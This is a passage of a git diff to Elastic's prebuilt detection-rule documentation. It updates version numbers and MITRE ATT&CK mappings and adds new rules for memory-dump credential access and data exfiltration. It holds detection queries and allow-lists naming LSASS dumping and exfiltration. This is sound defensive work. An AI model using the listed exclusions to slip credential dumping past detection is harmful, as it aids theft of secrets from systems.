a/docs/detections/prebuilt-rules/rule-details/outbound-scheduled-task-activity-via-powershell.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/outbound-scheduled-task-activity-via-powershell.asciidoc @@ -33,7 +33,7 @@ Identifies the PowerShell process loading the Task Scheduler COM DLL followed by * Tactic: Execution * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: 
@@ -68,3 +68,11 @@ sequence by host.id, process.entity_id with maxspan = 5s ** Name: Scheduled Task ** ID: T1053.005 ** Reference URL: https://attack.mitre.org/techniques/T1053/005/ +* Technique: +** Name: Command and Scripting Interpreter +** ID: T1059 +** Reference URL: https://attack.mitre.org/techniques/T1059/ +* Sub-technique: +** Name: PowerShell +** ID: T1059.001 +** Reference URL: https://attack.mitre.org/techniques/T1059/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/parent-process-pid-spoofing.asciidoc b/docs/detections/prebuilt-rules/rule-details/parent-process-pid-spoofing.asciidoc index a0f7d87131..aa213c12fb 100644 --- a/docs/detections/prebuilt-rules/rule-details/parent-process-pid-spoofing.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/parent-process-pid-spoofing.asciidoc @@ -29,9 +29,10 @@ Identifies parent process spoofing used to thwart detection. Adversaries may spo * OS: Windows * Use Case: Threat Detection * Tactic: Defense Evasion +* Tactic: Privilege Escalation * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -101,3 +102,15 @@ sequence by host.id, user.id with maxspan=3m ** Name: Parent PID Spoofing ** ID: T1134.004 ** Reference URL: https://attack.mitre.org/techniques/T1134/004/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Access Token Manipulation +** ID: T1134 +** Reference URL: https://attack.mitre.org/techniques/T1134/ +* Sub-technique: +** Name: Parent PID Spoofing +** ID: T1134.004 +** Reference URL: https://attack.mitre.org/techniques/T1134/004/ diff --git a/docs/detections/prebuilt-rules/rule-details/persistence-via-hidden-run-key-detected.asciidoc b/docs/detections/prebuilt-rules/rule-details/persistence-via-hidden-run-key-detected.asciidoc index 5cbe588f5d..ffea59cc8b 100644 --- a/docs/detections/prebuilt-rules/rule-details/persistence-via-hidden-run-key-detected.asciidoc 
+++ b/docs/detections/prebuilt-rules/rule-details/persistence-via-hidden-run-key-detected.asciidoc @@ -33,10 +33,12 @@ Identifies a persistence mechanism that utilizes the NtSetValueKey native API to * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Defense Evasion +* Tactic: Execution * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -89,3 +91,19 @@ registry where host.os.type == "windows" and /* length(registry.data.strings) > ** Name: Registry Run Keys / Startup Folder ** ID: T1547.001 ** Reference URL: https://attack.mitre.org/techniques/T1547/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/persistence-via-kde-autostart-script-or-desktop-file-modification.asciidoc b/docs/detections/prebuilt-rules/rule-details/persistence-via-kde-autostart-script-or-desktop-file-modification.asciidoc index 28a8c539c1..7c78fc03c4 100644 --- a/docs/detections/prebuilt-rules/rule-details/persistence-via-kde-autostart-script-or-desktop-file-modification.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/persistence-via-kde-autostart-script-or-desktop-file-modification.asciidoc @@ -36,7 +36,7 @@ Identifies the creation or modification of a K Desktop Environment (KDE) AutoSta * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: 
@@ -45,47 +45,6 @@ Identifies the creation or modification of a K Desktop Environment (KDE) AutoSta *Rule license*: Elastic License v2 -==== Investigation guide - - -[source, markdown] ----------------------------------- -### Elastic Defend Integration Setup -Elastic Defend is integrated into the Elastic Agent using Fleet. Upon configuration, the integration allows -the Elastic Agent to monitor events on your host and send data to the Elastic Security app. - -#### Prerequisite Requirements: -- Fleet is required for Elastic Defend. -- To configure Fleet Server refer to the {security-guide}/fleet/current/fleet-server.html[documentation]. - -#### The following steps should be executed in order to add the Elastic Defend integration on a Linux System: -- Go to the Kibana home page and click Add integrations. -- In the query bar, search for Elastic Defend and select the integration to see more details about it. -- Click Add Elastic Defend. -- Configure the integration name and optionally add a description. -- Select the type of environment you want to protect, either Traditional Endpoints or Cloud Workloads. -- Select a configuration preset. Each preset comes with different default settings for Elastic Agent, you can further customize these later by configuring the Elastic Defend integration policy. {security-guide}/security/current/configure-endpoint-integration-policy.html[Helper guide]. -- We suggest to select "Complete EDR (Endpoint Detection and Response)" as a configuration setting, that provides "All events; all preventions" -- Enter a name for the agent policy in New agent policy name. If other agent policies already exist, you can click the Existing hosts tab and select an existing policy instead. -For more details on Elastic Agent configuration settings, refer to the {security-guide}/fleet/8.10/agent-policy.html[helper guide]. -- Click Save and Continue. 
-- To complete the integration, select Add Elastic Agent to your hosts and continue to the next section to install the Elastic Agent on your hosts. -For more details on Elastic Defend refer to the {security-guide}/security/current/install-endpoint.html[helper guide]. - -### Auditbeat Setup -Auditbeat is a lightweight shipper that you can install on your servers to audit the activities of users and processes on your systems. For example, you can use Auditbeat to collect and centralize audit events from the Linux Audit Framework. You can also use Auditbeat to detect changes to critical files, like binaries and configuration files, and identify potential security policy violations. - -#### The following steps should be executed in order to add the Auditbeat for Linux System: -- Elastic provides repositories available for APT and YUM-based distributions. Note that we provide binary packages, but no source packages. -- To install the APT and YUM repositories follow the setup instructions in this {security-guide}/beats/auditbeat/current/setup-repositories.html[helper guide]. -- To run Auditbeat on Docker follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-docker.html[helper guide]. -- To run Auditbeat on Kubernetes follow the setup instructions in the {security-guide}/beats/auditbeat/current/running-on-kubernetes.html[helper guide]. -- For complete Setup and Run Auditbeat information refer to the {security-guide}/beats/auditbeat/current/setting-up-and-running.html[helper guide]. - -#### Custom Ingest Pipeline -For versions <8.2, you need to add a custom ingest pipeline to populate `event.ingested` with @timestamp for non-elastic-agent indexes, like auditbeats/filebeat/winlogbeat etc. For more details to add a custom ingest pipeline refer to the {security-guide}/fleet/current/data-streams-pipeline-tutorial.html[guide]. ----------------------------------- - ==== Rule query 
diff --git a/docs/detections/prebuilt-rules/rule-details/persistence-via-microsoft-office-addins.asciidoc b/docs/detections/prebuilt-rules/rule-details/persistence-via-microsoft-office-addins.asciidoc index b873031ab6..b40650ae29 100644 --- a/docs/detections/prebuilt-rules/rule-details/persistence-via-microsoft-office-addins.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/persistence-via-microsoft-office-addins.asciidoc @@ -35,7 +35,7 @@ Detects attempts to establish persistence on an endpoint by abusing Microsoft Of * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 104 +*Version*: 105 *Rule authors*: @@ -78,3 +78,7 @@ file where host.os.type == "windows" and event.type != "deletion" and ** Name: Office Application Startup ** ID: T1137 ** Reference URL: https://attack.mitre.org/techniques/T1137/ +* Sub-technique: +** Name: Add-ins +** ID: T1137.006 +** Reference URL: https://attack.mitre.org/techniques/T1137/006/ diff --git a/docs/detections/prebuilt-rules/rule-details/persistence-via-powershell-profile.asciidoc b/docs/detections/prebuilt-rules/rule-details/persistence-via-powershell-profile.asciidoc index 82ae257ad4..f034a6a2b2 100644 --- a/docs/detections/prebuilt-rules/rule-details/persistence-via-powershell-profile.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/persistence-via-powershell-profile.asciidoc @@ -33,10 +33,11 @@ Identifies the creation or modification of a PowerShell profile. PowerShell prof * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Privilege Escalation * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 5 +*Version*: 6 *Rule authors*: 
@@ -72,3 +73,15 @@ file where host.os.type == "windows" and event.type != "deletion" and ** Name: PowerShell Profile ** ID: T1546.013 ** Reference URL: https://attack.mitre.org/techniques/T1546/013/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Event Triggered Execution +** ID: T1546 +** Reference URL: https://attack.mitre.org/techniques/T1546/ +* Sub-technique: +** Name: PowerShell Profile +** ID: T1546.013 +** Reference URL: https://attack.mitre.org/techniques/T1546/013/ diff --git a/docs/detections/prebuilt-rules/rule-details/persistence-via-telemetrycontroller-scheduled-task-hijack.asciidoc b/docs/detections/prebuilt-rules/rule-details/persistence-via-telemetrycontroller-scheduled-task-hijack.asciidoc index d63e525474..20b3199c69 100644 --- a/docs/detections/prebuilt-rules/rule-details/persistence-via-telemetrycontroller-scheduled-task-hijack.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/persistence-via-telemetrycontroller-scheduled-task-hijack.asciidoc @@ -32,10 +32,11 @@ Detects the successful hijack of Microsoft Compatibility Appraiser scheduled tas * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Privilege Escalation * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 105 +*Version*: 106 *Rule authors*: 
@@ -82,3 +83,23 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Scheduled Task ** ID: T1053.005 ** Reference URL: https://attack.mitre.org/techniques/T1053/005/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Scheduled Task/Job +** ID: T1053 +** Reference URL: https://attack.mitre.org/techniques/T1053/ +* Sub-technique: +** Name: Scheduled Task +** ID: T1053.005 +** Reference URL: https://attack.mitre.org/techniques/T1053/005/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ diff --git a/docs/detections/prebuilt-rules/rule-details/persistence-via-update-orchestrator-service-hijack.asciidoc b/docs/detections/prebuilt-rules/rule-details/persistence-via-update-orchestrator-service-hijack.asciidoc index e89d6185b5..520e25e7f9 100644 --- a/docs/detections/prebuilt-rules/rule-details/persistence-via-update-orchestrator-service-hijack.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/persistence-via-update-orchestrator-service-hijack.asciidoc @@ -32,12 +32,13 @@ Identifies potential hijacking of the Microsoft Update Orchestrator Service to e * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Privilege Escalation * Use Case: Vulnerability * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: 
@@ -143,3 +144,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Windows Service ** ID: T1543.003 ** Reference URL: https://attack.mitre.org/techniques/T1543/003/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Exploitation for Privilege Escalation +** ID: T1068 +** Reference URL: https://attack.mitre.org/techniques/T1068/ +* Technique: +** Name: Hijack Execution Flow +** ID: T1574 +** Reference URL: https://attack.mitre.org/techniques/T1574/ diff --git a/docs/detections/prebuilt-rules/rule-details/persistence-via-wmi-event-subscription.asciidoc b/docs/detections/prebuilt-rules/rule-details/persistence-via-wmi-event-subscription.asciidoc index 0f7985fbba..52c8d4c38e 100644 --- a/docs/detections/prebuilt-rules/rule-details/persistence-via-wmi-event-subscription.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/persistence-via-wmi-event-subscription.asciidoc @@ -32,10 +32,11 @@ An adversary can use Windows Management Instrumentation (WMI) to install event f * OS: Windows * Use Case: Threat Detection * Tactic: Persistence +* Tactic: Execution * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -78,3 +79,11 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: Windows Management Instrumentation Event Subscription ** ID: T1546.003 ** Reference URL: https://attack.mitre.org/techniques/T1546/003/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Windows Management Instrumentation +** ID: T1047 +** Reference URL: https://attack.mitre.org/techniques/T1047/ diff --git a/docs/detections/prebuilt-rules/rule-details/port-forwarding-rule-addition.asciidoc b/docs/detections/prebuilt-rules/rule-details/port-forwarding-rule-addition.asciidoc index b094b361ee..0ff31682a6 100644 
--- a/docs/detections/prebuilt-rules/rule-details/port-forwarding-rule-addition.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/port-forwarding-rule-addition.asciidoc @@ -32,11 +32,12 @@ Identifies the creation of a new port forwarding rule. An adversary may abuse th * OS: Windows * Use Case: Threat Detection * Tactic: Command and Control +* Tactic: Defense Evasion * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 106 +*Version*: 107 *Rule authors*: @@ -114,3 +115,11 @@ registry where host.os.type == "windows" and registry.path : ( ** Name: Protocol Tunneling ** ID: T1572 ** Reference URL: https://attack.mitre.org/techniques/T1572/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Modify Registry +** ID: T1112 +** Reference URL: https://attack.mitre.org/techniques/T1112/ diff --git a/docs/detections/prebuilt-rules/rule-details/possible-fin7-dga-command-and-control-behavior.asciidoc b/docs/detections/prebuilt-rules/rule-details/possible-fin7-dga-command-and-control-behavior.asciidoc index 77a925cc30..11dd48b088 100644 --- a/docs/detections/prebuilt-rules/rule-details/possible-fin7-dga-command-and-control-behavior.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/possible-fin7-dga-command-and-control-behavior.asciidoc @@ -32,7 +32,7 @@ This rule detects a known command and control pattern in network events. The FIN * Tactic: Command and Control * Domain: Endpoint -*Version*: 103 +*Version*: 104 *Rule authors*: 
@@ -56,8 +56,8 @@ In the event this rule identifies benign domains in your environment, the `desti [source, js] ---------------------------------- -(event.dataset: (network_traffic.tls or network_traffic.http) or - (event.category: (network or network_traffic) and type: (tls or http) and network.transport: tcp)) and +(event.dataset: (network_traffic.tls OR network_traffic.http) or + (event.category: (network OR network_traffic) AND type: (tls OR http) AND network.transport: tcp)) AND destination.domain:/[a-zA-Z]{4,5}\.(pw|us|club|info|site|top)/ AND NOT destination.domain:zoom.us ---------------------------------- diff --git a/docs/detections/prebuilt-rules/rule-details/possible-okta-dos-attack.asciidoc b/docs/detections/prebuilt-rules/rule-details/possible-okta-dos-attack.asciidoc index 873e7b77b0..79def4629f 100644 --- a/docs/detections/prebuilt-rules/rule-details/possible-okta-dos-attack.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/possible-okta-dos-attack.asciidoc @@ -32,7 +32,7 @@ Detects possible Denial of Service (DoS) attacks against an Okta organization. A * Data Source: Okta * Tactic: Impact -*Version*: 104 +*Version*: 205 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-abuse-of-repeated-mfa-push-notifications.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-abuse-of-repeated-mfa-push-notifications.asciidoc index fae89442b0..be5500e2cf 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-abuse-of-repeated-mfa-push-notifications.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-abuse-of-repeated-mfa-push-notifications.asciidoc @@ -31,7 +31,7 @@ Detects when an attacker abuses the Multi-Factor authentication mechanism by rep * Tactic: Credential Access * Data Source: Okta -*Version*: 106 +*Version*: 207 *Rule authors*: 
diff --git a/docs/detections/prebuilt-rules/rule-details/potential-code-execution-via-postgresql.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-code-execution-via-postgresql.asciidoc index 38afde074a..283f833c17 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-code-execution-via-postgresql.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-code-execution-via-postgresql.asciidoc @@ -31,7 +31,7 @@ This rule monitors for suspicious activities that may indicate an attacker attem * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 3 +*Version*: 4 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-dcsync.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-dcsync.asciidoc index a7954cc74f..79fbbf2948 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-dcsync.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-dcsync.asciidoc @@ -36,11 +36,12 @@ This rule identifies when a User Account starts the Active Directory Replication * OS: Windows * Use Case: Threat Detection * Tactic: Credential Access +* Tactic: Privilege Escalation * Data Source: Active Directory * Resources: Investigation Guide * Use Case: Active Directory Monitoring -*Version*: 109 +*Version*: 110 *Rule authors*: @@ -135,3 +136,15 @@ any where event.action == "Directory Service Access" and ** Name: DCSync ** ID: T1003.006 ** Reference URL: https://attack.mitre.org/techniques/T1003/006/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Domain Accounts +** ID: T1078.002 +** Reference URL: https://attack.mitre.org/techniques/T1078/002/ 
diff --git a/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-lsass-memory-dump.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-lsass-memory-dump.asciidoc index aefe7c74ba..8ec78fbaa6 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-lsass-memory-dump.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-lsass-memory-dump.asciidoc @@ -31,9 +31,10 @@ Identifies suspicious access to LSASS handle from a call trace pointing to DBGHe * OS: Windows * Use Case: Threat Detection * Tactic: Credential Access +* Tactic:Execution * Data Source: Sysmon Only -*Version*: 206 +*Version*: 207 *Rule authors*: @@ -80,3 +81,11 @@ process where host.os.type == "windows" and event.code == "10" and ** Name: LSASS Memory ** ID: T1003.001 ** Reference URL: https://attack.mitre.org/techniques/T1003/001/ +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-memory-dump-file-creation.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-memory-dump-file-creation.asciidoc new file mode 100644 index 0000000000..baf367fdff --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-memory-dump-file-creation.asciidoc 
@@ -0,0 +1,102 @@ +[[potential-credential-access-via-memory-dump-file-creation]] +=== Potential Credential Access via Memory Dump File Creation + +Identifies the creation or modification of a medium size memory dump file which can indicate an attempt to access credentials from a process memory. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Data Source: Elastic Defend +* Rule Type: BBR + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +file where host.os.type == "windows" and event.type == "creation" and + + /* MDMP header */ + file.Ext.header_bytes : "4d444d50*" and file.size >= 30000 and + not + + ( + ( + process.executable : ( + "?:\\Windows\\System32\\WerFault.exe", + "?:\\Windows\\SysWOW64\\WerFault.exe", + "?:\\Windows\\System32\\Wermgr.exe", + "?:\\Windows\\SysWOW64\\Wermgr.exe", + "?:\\Windows\\System32\\WerFaultSecure.exe", + "?:\\Windows\\System32\\WUDFHost.exe", + "?:\\Windows\\System32\\Taskmgr.exe", + "?:\\Windows\\SysWOW64\\Taskmgr.exe", + "?:\\Program Files\\*.exe", + "?:\\Program Files (x86)\\*.exe", + "?:\\Windows\\SystemApps\\*.exe", + "?:\\Users\\*\\AppData\\Roaming\\Zoom\\bin\\zCrashReport64.exe" + ) and process.code_signature.trusted == true + ) or + ( + file.path : ( + "?:\\ProgramData\\Microsoft\\Windows\\WER\\*", + "?:\\ProgramData\\Microsoft\\WDF\\*", + "?:\\ProgramData\\Alteryx\\ErrorLogs\\*", + "?:\\ProgramData\\Goodix\\*", + "?:\\Windows\\system32\\config\\systemprofile\\AppData\\Local\\CrashDumps\\*", + 
"?:\\Users\\*\\AppData\\Roaming\\Zoom\\logs\\zoomcrash*", + "?:\\Users\\*\\AppData\\*\\Crashpad\\*", + "?:\\Users\\*\\AppData\\*\\crashpaddb\\*", + "?:\\Users\\*\\AppData\\*\\HungReports\\*", + "?:\\Users\\*\\AppData\\*\\CrashDumps\\*", + "?:\\Users\\*\\AppData\\*\\NativeCrashReporting\\*" + ) and (process.code_signature.trusted == true or process.executable == null) + ) + ) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: LSASS Memory +** ID: T1003.001 +** Reference URL: https://attack.mitre.org/techniques/T1003/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-renamed-com-services-dll.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-renamed-com-services-dll.asciidoc index 07beff23d5..684adc6f9e 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-renamed-com-services-dll.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-renamed-com-services-dll.asciidoc @@ -30,9 +30,10 @@ Identifies suspicious renamed COMSVCS.DLL Image Load, which exports the MiniDump * OS: Windows * Use Case: Threat Detection * Tactic: Credential Access +* Tactic: Defense Evasion * Data Source: Sysmon Only -*Version*: 104 +*Version*: 105 *Rule authors*: 
@@ -78,3 +79,15 @@ sequence by process.entity_id with maxspan=1m ** Name: LSASS Memory ** ID: T1003.001 ** Reference URL: https://attack.mitre.org/techniques/T1003/001/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Rundll32 +** ID: T1218.011 +** Reference URL: https://attack.mitre.org/techniques/T1218/011/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-trusted-developer-utility.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-trusted-developer-utility.asciidoc index 801b797ec8..8b53911a47 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-trusted-developer-utility.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-trusted-developer-utility.asciidoc @@ -29,10 +29,11 @@ An instance of MSBuild, the Microsoft Build Engine, loaded DLLs (dynamically lin * OS: Windows * Use Case: Threat Detection * Tactic: Credential Access +* Tactic: Defense Evasion * Resources: Investigation Guide * Data Source: Elastic Defend -*Version*: 107 +*Version*: 108 *Rule authors*: 
@@ -123,3 +124,27 @@ sequence by process.entity_id ** Name: OS Credential Dumping ** ID: T1003 ** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Sub-technique: +** Name: Security Account Manager +** ID: T1003.002 +** Reference URL: https://attack.mitre.org/techniques/T1003/002/ +* Technique: +** Name: Credentials from Password Stores +** ID: T1555 +** Reference URL: https://attack.mitre.org/techniques/T1555/ +* Sub-technique: +** Name: Windows Credential Manager +** ID: T1555.004 +** Reference URL: https://attack.mitre.org/techniques/T1555/004/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Trusted Developer Utilities Proxy Execution +** ID: T1127 +** Reference URL: https://attack.mitre.org/techniques/T1127/ +* Sub-technique: +** Name: MSBuild +** ID: T1127.001 +** Reference URL: https://attack.mitre.org/techniques/T1127/001/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-windows-utilities.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-windows-utilities.asciidoc index 5c5d6daae6..e4581a569b 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-windows-utilities.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-windows-utilities.asciidoc @@ -33,11 +33,12 @@ Identifies the execution of known Windows utilities often abused to dump LSASS m * OS: Windows * Use Case: Threat Detection * Tactic: Credential Access +* Tactic: Defense Evasion * Resources: Investigation Guide * Data Source: Elastic Endgame * Data Source: Elastic Defend -*Version*: 108 +*Version*: 109 *Rule authors*: 
@@ -144,3 +145,15 @@ process where host.os.type == "windows" and event.type == "start" and ** Name: NTDS ** ID: T1003.003 ** Reference URL: https://attack.mitre.org/techniques/T1003/003/ +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: System Binary Proxy Execution +** ID: T1218 +** Reference URL: https://attack.mitre.org/techniques/T1218/ +* Sub-technique: +** Name: Rundll32 +** ID: T1218.011 +** Reference URL: https://attack.mitre.org/techniques/T1218/011/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-curl-cve-2023-38545-exploitation.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-curl-cve-2023-38545-exploitation.asciidoc index 22e17b49e2..451f11779c 100644 --- a/docs/detections/prebuilt-rules/rule-details/potential-curl-cve-2023-38545-exploitation.asciidoc +++ b/docs/detections/prebuilt-rules/rule-details/potential-curl-cve-2023-38545-exploitation.asciidoc @@ -34,7 +34,7 @@ Detects potential exploitation of curl CVE-2023-38545 by monitoring for vulnerab * Tactic: Execution * Data Source: Elastic Defend -*Version*: 1 +*Version*: 2 *Rule authors*: diff --git a/docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-destination-port.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-destination-port.asciidoc new file mode 100644 index 0000000000..dcc45c26c8 --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-destination-port.asciidoc 
@@ -0,0 +1,58 @@ +[[potential-data-exfiltration-activity-to-an-unusual-destination-port]] +=== Potential Data Exfiltration Activity to an Unusual Destination Port + +A machine learning job has detected data exfiltration to a particular destination port. Data transfer patterns that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-6h ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/ded + +*Tags*: + +* Use Case: Data Exfiltration Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Exfiltration + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Exfiltration +** ID: TA0010 +** Reference URL: https://attack.mitre.org/tactics/TA0010/ +* Technique: +** Name: Exfiltration Over C2 Channel +** ID: T1041 +** Reference URL: https://attack.mitre.org/techniques/T1041/ diff --git a/docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-ip-address.asciidoc b/docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-ip-address.asciidoc new file mode 100644 index 0000000000..cb25cec05d --- /dev/null +++ b/docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-ip-address.asciidoc 
@@ -0,0 +1,58 @@ +[[potential-data-exfiltration-activity-to-an-unusual-ip-address]] +=== Potential Data Exfiltration Activity to an Unusual IP Address + +A machine learning job has detected data exfiltration to a particular geo-location (by IP address). Data transfers to geo-locations that are outside the normal traffic patterns of an organization could indicate exfiltration over command and control channels. + +*Rule type*: machine_learning + +*Rule indices*: None + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 15m + +*Searches indices from*: now-6h ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.elastic.co/guide/en/security/current/prebuilt-ml-jobs.html +* https://docs.elastic.co/en/integrations/ded + +*Tags*: + +* Use Case: Data Exfiltration Detection +* Rule Type: ML +* Rule Type: Machine Learning +* Tactic: Exfiltration + +*Version*: 1 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- + +---------------------------------- + +*Framework*: MITRE 